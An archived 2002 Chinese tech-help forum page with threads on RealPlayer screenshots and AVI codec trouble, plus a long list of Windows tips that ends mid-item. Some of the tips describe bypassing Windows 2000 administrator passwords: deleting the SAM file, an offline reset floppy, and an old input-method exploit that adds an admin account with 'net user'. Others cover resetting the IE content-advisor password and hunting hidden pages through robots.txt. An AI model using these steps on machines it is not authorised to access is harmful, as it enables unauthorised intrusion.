:::Pink Rabbit Outside The Forest:::
[ Welcome to PRHOUSE ]
linyifei2000

超级用户
积分：426
发帖：172
来自：Canada
注册：2002-05-02
 发表于 2002-05-15 19:33:44 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP
楼上的，鼠标右键--〉打开方式—〉winmap(总是以这种方式打开前面选勾）

大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
上一贴 | 下一贴
快速回复 | 主题：安完realplayer出现的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


求助：realplay下面如何截图？

计算机技术
求助：realplay下面如何截图？

上一贴 | 下一贴
发表人 主题: 求助：realplay下面如何截图？
supering

超级用户
积分：325
发帖：87
来自：192.168.2.22
注册：2002-01-10
 发表于 2002-05-13 13:47:07 按此观看supering的个人资料 按此发邮件给supering 收藏该主题供以后查看 发送悄悄话给supering 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看supering的IP
我用Hypersnap截图总是截下来的漆黑一片，怎么截才能截下画面？

我爱网络，我爱多媒体！
急需在网页设计制作、网络编程、平面图像处理、硬件方面充电！请大家多多关照！
18

超级用户
积分：317
发帖：95
来自：NN,GX,CN
注册：2002-05-06
 发表于 2002-05-13 14:00:43 按此观看18的个人资料 按此发邮件给18 访问18的主页 18 的 oicq 是22770777,查看 22770777 的资料 发送悄悄话给18 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看18的IP
帮你找了一篇文章，希望对你有帮助：
Realplayer的出现，提供了一个低成本观看影视的可能。至少我是用Realplayer看了许多过去想看而花费不起的电影、电视剧。但是，和许多朋友一样，当我想把屏幕上迷人的画面截下来时，发现无法和VCD一样截图。用了几种常用截图工具截下来的都是黑黑的。难道Realplayer的画面只能“匆匆一瞥”，无法“长驻心间”？兄弟我网上网下拜师访友，千辛万苦，终于搜集到几种realplayer的截图方法。看到网上不断地有网友询问Realplayer如何截图，赶紧请小编给点版面，把方法告诉大家。
第一种方法是用《东方影都》立体版，它直接提供了相关功能。不过你要花40元钱，呵哈，支持国产正版软件吧！
如果你的爱机里装有大名鼎鼎的HyperSnap－DX的话，我就告诉你第二种方法(我用的是4.01.09版)。什么，截不下图来？忘了说了，首先要做些设置，follow me：进入“捕捉→启用特殊捕捉”，把两个有关DirectX的复选框都选上。好了，要截图时按下Scroll Lock键或自定义的快捷键。是不是截下图来了？
“舍近求远”可能是很多电脑迷的通病了，明明手头的软件就可以用，偏偏不断地下载、安装、试用新的软件。说到Realplayer截图也一样。其实用Windows自带工具就行了(你不能不佩服微软及Windows的功能强大吧)。这是第三种，最简单的方法：当你播放Realplayer时，按“Ctrl+P(暂停)”，再按Print Scree键。然后，打开“开始→程序→附件→画图”，再粘贴。请相信自己的眼睛，这是真的，这幅美丽的画面你已截下来了。

--Welcome to my Forum!--
supering

超级用户
积分：325
发帖：87
来自：192.168.2.22
注册：2002-01-10
 发表于 2002-05-13 14:07:20 按此观看supering的个人资料 按此发邮件给supering 发送悄悄话给supering 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看supering的IP
没有用，还是老样子，别哄我呀！！！
我是在XP下用的real one！

我爱网络，我爱多媒体！
急需在网页设计制作、网络编程、平面图像处理、硬件方面充电！请大家多多关照！
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-15 14:38:32 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
把realplayer暂停，打开Hypersnap
选择

,抓一次，最小化，再点ALT+Print Screen SysRq键，看看抓到了没有？

看看：

[这消息被51windows编辑过(编辑时间2002-05-15 14:45:38)]

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：求助：realplay下面如何截图？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


天呀!我看不了?!?!

计算机技术
天呀!我看不了?!?!

上一贴 | 下一贴
发表人 | 主题: 天呀!我看不了?!?!
2599 超级用户 积分：385 发帖：112 来自：Lee.com.cn 注册：2001-06-17 | 发表于 2002-05-17 12:58:01 按此观看2599的个人资料 按此发邮件给2599 2599 的 oicq 是9642298,查看 9642298 的资料 收藏该主题供以后查看 发送悄悄话给2599 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2599的IP 我下了两集"寻秦记",avi格式的,开始播放不了:用Realplayer放说没有该插件;用Mediaplayer放说无权播放;但朋友的什么都能放.后来安装了DivX412Codec.exe,用上述软件都能播放了,但就是只有画面,没有声音...到底是怎么回事呀?哪位高手能帮帮忙?! --I do what I love...-- 水的心事难以猜透?鱼儿不这样认为,因为它就在水的心中...
linyifei2000 超级用户 积分：426 发帖：172 来自：Canada 注册：2002-05-02 | 发表于 2002-05-17 13:15:42 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP 用MP8.0 大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-05-17 13:16:14 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 从哪儿下载的，应该都有说明的！ http://www.bluebox.com.cn/company/bluebox/ingeer.htm MPEG压缩软件TMPGEnc的应用 http://www.qingmedia.com/articles/001003_tmpgenc.htm [这消息被51windows编辑过(编辑时间2002-05-17 13:21:19)] Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
2599 超级用户 积分：385 发帖：112 来自：Lee.com.cn 注册：2001-06-17 | 发表于 2002-05-17 13:20:41 按此观看2599的个人资料 按此发邮件给2599 2599 的 oicq 是9642298,查看 9642298 的资料 发送悄悄话给2599 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2599的IP 我用的就是MP8.0,我的声卡是SB Live!有问题吗?? --I do what I love...-- 水的心事难以猜透?鱼儿不这样认为,因为它就在水的心中...
linyifei2000 超级用户 积分：426 发帖：172 来自：Canada 注册：2002-05-02 | 发表于 2002-05-17 13:24:44 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP 上网的时候，会自动下载编码，你不要按取消就OK 大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
天蓝 高级用户 积分：229 发帖：67 来自：蓝色天空 注册：2002-05-17 | 发表于 2002-05-17 16:57:53 按此观看天蓝的个人资料 该用户不允许显示它的电子邮件 天蓝 的 oicq 是2923431,查看 2923431 的资料 发送悄悄话给天蓝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天蓝的IP 装AC3了吗？ 天空是什么颜色的，如果汪洋是蓝色的；我说天空也是蓝色的，因为他们彼此相爱了。
我是菜 超级用户 积分：304 发帖：151 来自：冥王星 注册：2002-03-08 | 发表于 2002-05-17 19:27:39 按此观看我是菜的个人资料 按此发邮件给我是菜 访问我是菜的主页 我是菜 的 oicq 是21244108,查看 21244108 的资料 发送悄悄话给我是菜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看我是菜的IP 不看了，两集寻秦记嘛！！！ http://61.138.25.34 在线看吧！！rm格式的！！速度还可以！！ =Blueidea= wo shi cai
2599 超级用户 积分：385 发帖：112 来自：Lee.com.cn 注册：2001-06-17 | 发表于 2002-05-18 00:23:36 按此观看2599的个人资料 按此发邮件给2599 2599 的 oicq 是9642298,查看 9642298 的资料 发送悄悄话给2599 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2599的IP 回linyifei2000:自动下载编码会失败... 回天蓝:什么是AC3呀?! 回我是菜:这不是看不看的问题,关键是我要解决这个问题呀?! --I do what I love...-- 水的心事难以猜透?鱼儿不这样认为,因为它就在水的心中...
linyifei2000 超级用户 积分：426 发帖：172 来自：Canada 注册：2002-05-02 | 发表于 2002-05-18 00:31:04 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP 用超级解霸XP，安装的时候会有装编码的部分，装完之后应该没问题了。要是再不能看，你还是换台电脑为妙。 (开玩笑的，有什么不明白发贴） 大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
2599 超级用户 积分：385 发帖：112 来自：Lee.com.cn 注册：2001-06-17 | 发表于 2002-05-18 10:30:19 按此观看2599的个人资料 按此发邮件给2599 2599 的 oicq 是9642298,查看 9642298 的资料 发送悄悄话给2599 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2599的IP 但我今天下的"蓝色生死恋",也是avi格式的,却可以看呀!!?? --I do what I love...-- 水的心事难以猜透?鱼儿不这样认为,因为它就在水的心中...
天蓝 高级用户 积分：229 发帖：67 来自：蓝色天空 注册：2002-05-17 | 发表于 2002-05-18 17:22:02 按此观看天蓝的个人资料 该用户不允许显示它的电子邮件 天蓝 的 oicq 是2923431,查看 2923431 的资料 发送悄悄话给天蓝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天蓝的IP 到google.com搜索AC3。找到后下载，安装。 天空是什么颜色的，如果汪洋是蓝色的；我说天空也是蓝色的，因为他们彼此相爱了。
我是菜 超级用户 积分：304 发帖：151 来自：冥王星 注册：2002-03-08 | 发表于 2002-05-20 01:38:54 按此观看我是菜的个人资料 按此发邮件给我是菜 访问我是菜的主页 我是菜 的 oicq 是21244108,查看 21244108 的资料 发送悄悄话给我是菜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看我是菜的IP 我知道了 ！！！ 我的机子也出现这种问题！！ 你的那两集寻秦记肯定没有COPY完！！要么就是刻盘的时候就没刻完！！是一个不完整的avi文件，所以打不开！！ 我的机子就是这样！！没COPY完的时候打开就跟你说的一样！！完了之后就好了 ！！！ =Blueidea= wo shi cai
上一贴 | 下一贴
快速回复 | 主题：天呀!我看不了?!?!
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


操作技巧与文件扩展名知识

计算机技术
操作技巧与文件扩展名知识

上一贴 | 下一贴
发表人 主题: 操作技巧与文件扩展名知识
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-14 07:51:46 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
1.win2000下的user.dmp是什么文件？
内存转储文件，系统出错时内存的映像
2.IE中的"内容"审查密码忘了怎办？
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key方法是先把一台已知密码的机子的IE设密码,然后纪录该键值,在这台机子上改就成了!
3.如何解锁电脑（注册表）？
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
另存为1.reg然后双击
4.loadqm.exe 是什么？
Loads the MSN Explorer Query Manager的缩写，在安装完MSN后更新了注册表，此程序运行与否对使用msn没有影响
Loadqm.exe是MSN Queue Manager的一个组件，当您安装了MSN Explorer或MSN Messenger或Windows XP后就会随系统自动启动。
这个服务用于在后台进行系统所需的数据传送，如软件更新信息等，同时对这些传送进行排队和限流以不影响用户交互操作的带宽。
5.2000任务管理器中的cidaemon.exe？
cidaemon.exe > Component of Ci Filer Service 组成Ci文档服务
是索引服务的一个组成。是文件索引服务进程，你可以在搜索对话框的搜索选项下禁止索引服务
6.win2000 唯一的管理员密码忘记怎么办？
1。将硬盘拆下，安装到另一台计算机上，删除%systemroot%\system32\config\SAM
2.对原来的系统进行修复，也就是重新安装并覆盖原来的2000，这样会出现让你重新输入管理员口令的对话框，这时你就可以修改口令了，而且可以保证原来的用户信息不会丢失。
3.利用专门的工具来修改：
如：http://www.sometips.com/soft/bd010114.bin ,如果没有rawrite.exe，可以下载一个Winimage来解开该文件到软盘

一、生成工具软盘：
        1、将rawrite.exe xxxx.bin的两个文件保存到硬盘的c:\ntcrk目录；
        2、准备一张质量好的软盘放入软驱，进入命令行，format a: /u /v:ntcrk 格式化
以保证该软盘没有坏区；进入c:\ntcrk目录，raw /d a: /f ntcrk.img 生成工具盘。
    二、修改administrator的密码（不需要知道原来的密码）：
        1、在有问题的系统上（你不需要拆硬盘到其他机器了），用工具软盘启动；
        2、Press return/enter to continue　按回车继续；
        3、Do you have your NT disks on a SCSI controller? 如果你的NT硬盘接在
SCSI卡上，请键入y后回车，否则键入n后回车，如果能检测到你的SCSI卡会显示出发现的硬盘。
        4、What partition contains your NT installation? 根据列出的分区列表，输入你的NT系统所在的分区名称，其实就是SAM文件所在的分区,如：/dev/hda1，分区会MOUNT到/MNT去，可以从其他的VCRT（ALT+F2）去看，cd、ls
        5、Select what you want to do:1.改密码 ----
        6、输入SAM文件所在的路径
        7、输入SAM文件名---取默认的就行
        8、列出SAM中的所有用户名，输入要修改的用户名，取默认的administrator即可
        9、输入新密码，如1234567890，不能不输密码
        10、是否修改？当然是y了
        11、还修改其他用户密码就输入要修改的用户名，否则就输!到下一步
        12、Write hive file? 当然y了，否则Nothing have changed,xixi
        13、About to write file back! Do it?当然y了，注意，如果你从其他VCRT进入了/以外的目录要先回到/目录。
        14、恭喜你！！！如果你的运气跟我一样好。把软盘拿出来CTRL+ALT+DEL to reboot into NT,用你的新密码登录吧！

试试我这种方法:
用户不小心忘记了密码，造成无法登录Windows2000 时，只需用启动盘启动电脑或引导进入另一操作系统（如电脑安装有Win98与Win2000双系统），找到文件夹“X:\Documents and Settings\Administrator”（X为Windows2000所在磁盘的盘符），将此文件夹下的 “Cookies”文件夹删除，然后重新启动电脑，即可以空密码快速登录Windows2000。为安全起见，用户可重新设置各用户密码

方法一：
以前可以用输入法漏洞：不知道你的机器是否装了sp2。
net user rinus rinus /ADD
net localgroup administrators rinus/ADD
sp2已经把这打上补丁了。

方法2：
将硬盘摘下挂在另一台WIN2000的机子上，查看它，删掉SAM文件或者拿到本地破解！

方法3：
如果系统分区是fat，在DOS下删除C:\winnt\system32\config\sam*.* 文件即可获得管理员权限。登陆只要输入administrator不输密码即可。然后创建一个新的。
如果是NTFS分区的，去下载NTFSDOS,就可以用dos访问ntfs.
地址：
http://www8.pconline.com.cn/download/swdetail.phtml?id=6872

说明如下：
NTFSDOS Pro是一个可以制作启动盘的工具，它所制作的启动盘的与众不同之处在于：虽然使用的是MS-DOS，但却可以读写NTFS格式文件系统，所有DOS命令都可以使用在NTFS格式系统上。简单的说，它包括如下功能：
·对NTFS文件系统的完全读写操作。
·MS-DOS下支持长文件名
·简单实用的启动盘制作精灵
·Windows NT/2000/XP完全兼容

一般情况下，普通用户要想使用控制面板里的“用户和密码”工具，必须提供管理员级密码。但由于疏忽，在XP中，如果普通用户运行控制面板里的“管理工具”，则不需提供上述密码和账号。因此，他可以取得计算机管理工具的使用权，而且可以由此获得本地用户和用户组的使用权。因此也就可以获得添加用户的权力。同时他还具备更改新建用户密码的权力。当然，属于普通用户组的用户不能创建管理员级用户，也不能改变其他组用户的密码。

    其实，这并不是一个BUG，这只不过是一个XP缺省状态下的不安全配置而已。这一不安全的备至将有可能是计算机的管理出现混乱。要解决此问题，只要以管理员身份把Power Users组的NT AUTHORTY\INTERACTIVE项去除就可以了。

7.改变win98录音机的录音长度限制？
1.打开录音机，安下“录音”按钮，这时在录音窗口右侧显示本次录音的长度为60秒，左侧显示本次录音的置。
2.待录音进行到一定的位置后，按下“停止”按钮。
3.打开“效果”菜单，选择“减速”，这时你会发现录音窗口右面显示长度为100秒。不断重复操作，直到录音长度增加到合适长度。
4.按“收索到开头”按钮，然后再按“录音”开始正式录音，这时候录音的长度就不是一分钟了！
8.给zip文件加注释？
下载的ZIP文件多了，就记不清他们都是干什么用的了，一一解开，太麻烦如果用鼠标一指它，文件的名字就出来不是很方便吗！winzip8.0就可以。举例：比如给dhyu.zip文件进行注释，首先用WINZIP8.0打开它，在工具栏展开ACTIVE（操作）菜单，选Comment（注释）项，在出现的“注释”窗口输入dhyu.zip名称，字体，窗口大小都可以调整。按:"save（保存）完毕。只要用鼠标一指它文件的名称就出来了！
9.让windows98更快:？
1、不要在开机时载入太多不必要的常驻程式。
2、将硬盘由FAT16转为FAT32。
3、Autoexecbat和Configsys中什么也不要写.
4、不要使用ActiveDesktop,否则系统运行速度会因此减慢（右击屏幕→寻显示器属性”→Web标签→将其中关于“活动桌面”和“频道”的选项全部取消。）
5、选择“开始→程序→附件→系统工具→系统信息→系统信息对话框”，然后，选择“工具→系统配置实用程序→Systemini”，点选Vcache，新建Maximum=xxxx，再新建Minimum=xxxx，xxxx处请依照 内存大小换算后填入，公式为：内存数×256（2的8次方），如32M内存则填写如下：
[Vcache] Maximum=8192 Minimum=8192 注意：xxxx≤12288
10.windows me使用小技:？
1.减肥法：在“我的电脑”点右键，选“属性”依此打开“性能”“文件系统”“疑难解答”选中“禁止系统还原”点“确定”然后用DOS键入“DEL_RESTORE”回车，按“Y”重启。
2.启动优化：“开始”-“运行”—输入msconfig,回车--启动项删除*scheduingAgent,*HiberMonitor,*StateMgr,*selfHostUtil,TaskMonitor.重启动。
11.巧去“添加/删除程序”中的残留信息？
去掉“添加/删除程序”中的残留信息(用户若手工删除了应用程序，则“控制面板”中的“添加/删除程序”将会留有残留信息，此时可启动REGEDIT，依次打开“HKEY_LOCAL-MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL”，则屏幕右边将显示出“添加/删除程序”中的有关项目，选中欲删除的项目“DEL”即可.)
12.修复internet exeplorer:？
IE5出了问题，但你一时找不到问题的所在，试试IE的自我修复功能。“开始”--控制面板--添加/删除，选中“internet exeplorer,这时候，系统会问你是否修复internet exeplorer.选中它，重启动电脑即可。
13.windows系统优化？
1，不要将C盘塞的满满的，以免影响windows的速度。
2，将windows的墙纸删掉。
3，桌面上不要放太多的图标，最好不要设屏保，这样可以可以节省更多的内存。
4，启动菜单里尽量少放启动项目，不要同时打开很多的窗口。
5，C盘最好只安装windows,其他的软件放在别的分区里。
6，机器用一段时间后在C盘里会产生垃圾碎片，我们可以将它优化。在我的电脑点右键，选“属性”点“性能”点“虚拟内存”自爱对话框里选“用户指定虚拟内存”，在硬盘的栏选硬盘（别选C盘），在最大值和最小值里添一个数字，别小于128MB。
7，DMA33模式，右键点我的电脑，属性--设备管理器--硬盘---双击----在DMA前面打对号，不理会windows提示，重启动。
14.Windows 98安装盘里的资源包？
在制作FLASH时候常会为找一些有意思的声音文件而在光盘市场里转溜吧！其实在Windows 98安装盘上就有现成的，Win98 75.CAB到Win98 80.CAB有近三百个声音文件，才10M，；而在Windows 98安装盘的WIN98 73.CAB ，WIN98 73.CAB 这个压缩包中还有桌面主题中的各种图片，这对苦于没有现成图片的制作工具的人员来讲，就不必费必寻找了。
15.让“瘟酒吧”更稳定的小技巧？
“瘟酒吧”系统BUG多多，以致于经常发生蓝屏、VMM错误、启动时出现错误信息等问题。你可以按照以下步骤来稳定系统：首先将98安装光盘放入光驱，点击“开始”-“程序”-“附件”-“系统工具”-“系统信息”，以系统信息的工个栏里选择“系统文件检查器”，再选择“从安装软盘提取一个文件”，将以下文件提到:X:\WINDOWS\SYSTEM\ VMM32中（X为你的系统所在分区）：configmg.vxd ,ntkern.vxd,vcomm.vxd,vdd.vxd,vdmad.vxd,vflatd.vxd和vmouse.vxd文件。
16.Windows 98安装程序SETUP中的隐藏参数？
格式: setup [batch] [/ie] [/im] [/is] [/iv] [/iw] [/id] [/nr]/ie 跳过制作启动盘/im 跳过常规内存检查/is 不运行scandisk(使用新的或刚刚格式化硬盘时可用处/iv 不显示公告版(即有关Windows 98新特性介绍)/iw 跳过版权认证/nr 跳过注册表检查Format的隐含参数/autotext 自动测试磁盘(即模拟格式化完毕后显示信息）/backup 同上,但有提示输入卷标/z:n 格式化后每一簇大小,n=１=512bytes,2=2×512bytes依此类推格式化时小心使用/u 执行无条件格式化,每一字均用十六帛Ｆ６覆盖无法恢复
17.保护Windows个人密码文件一招？
熟悉WIN95/98系统的用户都知道，有关用户密码信息都存贮在Windows目录下扩展名为.pwl的文件。这里告诉你一个简单而有效的保护方法：单击“开始”，“运行”输入sysedit打开“系统配置实用程序”选中关于文件system.ini这里你会发现在其列表中有一项标题为[Password Lists]的项，这就是有关用户密码文件的链接记录，其中CYS=C:\WINDOWS\CYS.PWL（等号前的“CYS”为用户名，等号后为该用户密码文件的存放路径及文件名）知道了这点，我们就可以进行修改，以便任意指定文件。比如，你可以事先将源文件CYS。PWL改名并复制到另一目录中，如在DOS方式中执行命令:COPY C:\WINDOWS\CYS.PWL C:\WINDOWS\SYSTEM\C1.DAT.然后再将System.ini中密码文件的存放路径改为CYS=C:\WINDOWS\SYSTEM\C1.DAT。这样，就没有人再能轻松地找到你的密码文了。
18.Windows 2000快捷运行命令？
单击“开始”菜单，打开“运行”命令框（或者用"Win+R"组合键打开），在打开的对话框中输入以下命令即可执行相应的功能drwtsn32----Dr.Watson for Windows 2000.eventvwr---事件查看器.ipsecmon--IP安全监视器.mmc---控制台.ntbackup---打开Windows2000备份及故障恢复工具.themes---打开桌面主题.wnchat---聊天功能.
19.Windows Me安装技巧？
如果你的Windows Me因故损坏，按以下方法重新安装能大提高速度：用启动盘将系统引导至纯DOS环境，如果你的系统安装在\WINDOWS目录，可以使用进入\windows\options\install,运行其中的Setup命令开始重新安装。Windows Me之所以将安装文件放入系统目录，一方面便于添加系统组件，另一方面有利于系统故障修复。如果你的硬盘空间非常紧张，可以在安装Windows Me后将"Options"文件夹删除。然后打开注册表HKEY LOCAL MACHINE\SOFT-WARE\Microsoft\Windows\CurrentVersion\Setup分支，将"SourcePath"的值改为"E:\Windows Me\"（E是你的光驱）。以后一旦Windows Me需要某些安装文件，就会自动到光盘上找。
20.何清除IE标题栏的恶意修改？
现在许多的个人网站站长为了片面追求访问量，使用了许多令人讨厌的方法，如强制加入收藏夹，强制设为首页。现在新的方法是修改你的注册表，将你的浏览器的标题栏加入他的网站的广告。如**网站 地址：****，很是烦人。我也受过其害，以为是中了病毒！现将解决的方法告诉大家！打开start->run->regedit，开始/运行/输入regedit 打开注册表按顺序进入HK_CURRENT_USER\software\microsoft\internet explorer\main, 然后 清除这个键值"window title" 你会看到你讨厌的广告文字在其后面，清除后关闭注册器！然后你重新打开IE,它运行默认的标题。一切ok!
21.破解“非法操作”现象密技？
大家都遇到过这样的问题，有时候在操作windows98系统的时候，就会出现一个对话框：“该程序执行了非法操作，如果仍有问题，请与程序供应商联系”。你也曾打开过‘详细资料“但只能看到“xxxxxx在xxxx的模块导致xx错误“的信息。你可能知道应用程序内部出现了问题，但只能关闭。
windows中这种问题叫做GENERAL PROTECTION FAULT，简称GPF。打开windows的系统信息，点击“工具”下的Dr.Watson,它是一个专门诊断GPF的小程序。启动Dr.Watson,它开始收集系统信息生成快照。就会查出错误所在，关闭错误，就行了！
22.如何解除系统启动时调用的程序？
很多软件需要在计算机启动的时候运行一个程序，如“超级解霸”等。这个程序并不是加在“启动”中的，而是加入在系统的注册表里了。所以在“启动”中是看不到的。要想解除一些程序在开机后自动运行可以试着去修改一下注册表。具体方法是：选择“开始/运行”输入regedit，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run目录，这个目录中所有的内容就是在计算机启动时要被执行的程序，不想要哪个删除就可以了。
23.找找死机的原因ASD？
ASD是windows自带的一个小工具能够帮助你在启动的时候自动跳过一部分能够导致系统崩溃的驱动程序。在“开始”-运行后输入ASD，启动该程序。如果程序告诉你“这台机器没有出现严重的ASD操作失败”那么你的机器管理的不错。如果有问题的话ASD就会弹出一个窗口，列出所有失败的错误和操作。此时在程序前面的复选匡中打勾，确定。即可！
24.查看秘密网页？
当你在一个喜爱的站点漫游时，有没有想到过，Web站的有些内容，不是对外公开的，一般的读者无法看到这些页面。你是否想看看有哪些秘密网页呢，有一个办法，就是利用robots.txt文件。这个文件中列出了未公开页面的名称，用来告诉搜索引擎这些页面不在搜索范围之列。在浏览器地址栏中的网址后加上“/robots.txt”，你就可看到那些秘密网页的文件或文件夹列表。此后，在地址栏直接键入这些网页名，就可一睹秘密页面.---选自《红客联盟》--军人。
25.让Realplayer从“启动”中消失？
点系统托盘区Realplayer图标，弹出的菜单中选“首选项”，在“常规”下的"StarCenter设置”中将“启用StarCenter”前的对号去掉。然后在弹出的对话框点“确定”即可。
26.迅速查看网站更新时间？
有些站点会给你看最新更新的时间，对于没有给出更新时间的站点怎样知道更新时间呢？方法：打开该网站，在浏览器地址栏输入：javascript:alert(document.lastModified),再按回车。
27.巧给电源风扇加油？
有些不用给风扇拆下也能加油，找一只注射器吸少许缝纫机油，在机箱背面找到电源风扇中心位置的小孔，插入针头直接注射。
28.给注册表解锁？
如果你给注册表加密后导致自己都无法修改，可采用以下方法解锁：1.如果你对修改前的注册表文件(system.dat和user.dat)有备份，可以将它们拷到Windows目录下，覆盖对应文件即可。2.如果你没有备份，可以在DOS方式下转到Windows目录，运行scanreg/restore，选定以前某天系统对注册表的备份，直接恢复即可。
29.Alt键的妙用？
激活菜单命令：按下Alt键可以激活活动窗口的菜单栏，使菜单栏的第一个菜单为高亮条，而按下Alt键和一个相应的字每就可以激活这个字母所代表的菜单项。快速查看属性：按下Alt+Enter组合ｚ键或按住Alt键的同时用鼠标左键双击某对象，则可快速打开其属性的对话框。切换应用程序：连续按下Alt+ESC键可以直接切换到已经运行但没有最小化的各个应用程序，而按住Alt键不放再连续按下Tab键则可以在一个对话框中显示出已经运行的所有程序的图标和当前激活的程序的图标及其名称，只要释放Alt键便可以立刻切换到该应用程序中。撤消上步操作：在Ｗin98的各对话框中，凡是对编辑的操作都可以通过Alt+Backspace键来撤消.拷贝活动窗口按下Print Screen可以拷贝当前屏幕的内容，但是按Alt+PrintScreen键则可以拷贝当前活动窗口的内容。
30.轻松化解下载文件错误？
历经M次断线，花费N小时，用网络蚂蚁下回XX兆的文件却无法打开，真想哭都找不着调啊，不要不要悲伤，不妨看看以下两点。1.对于ZIP文件，请不要从网络蚂蚁删除下载任务，也不要移动下载的文件，打开网络蚂蚁，在下载的任务上右面击鼠标，从弹出的菜单中选“修复损坏的ZIP文件”，网络蚂蚁将对文件进行CRC校验，并标出损坏区域，然后重新下载损坏的区域。2.对于可自解压的EXE文件，不要理系统的提示，只要把后缀改为ZIP，调用WinZip打开试试。
31.如何知道下载的文件类型？
系统可以自动隐藏文件类型的扩展名，可以在资源管理器里点击“工具”菜单，选择“文件夹选项”后再选择“查看”标签，然后把“隐藏已知文件扩展名”前的钩去掉。对于这一类的文件，实际上系统已经建立好了联系，你直接点击该文件一般都能自动运行。另外，我们一般都可以根据下载文件的内容大体上推测文件的类型：比如.EXE、ZIP、SCR等等。当然，如果你的计算机中没有打开所下载文件的应用程序，你最好在下载前稍微留心点。
32.在DOS环幸境下创建启动盘？
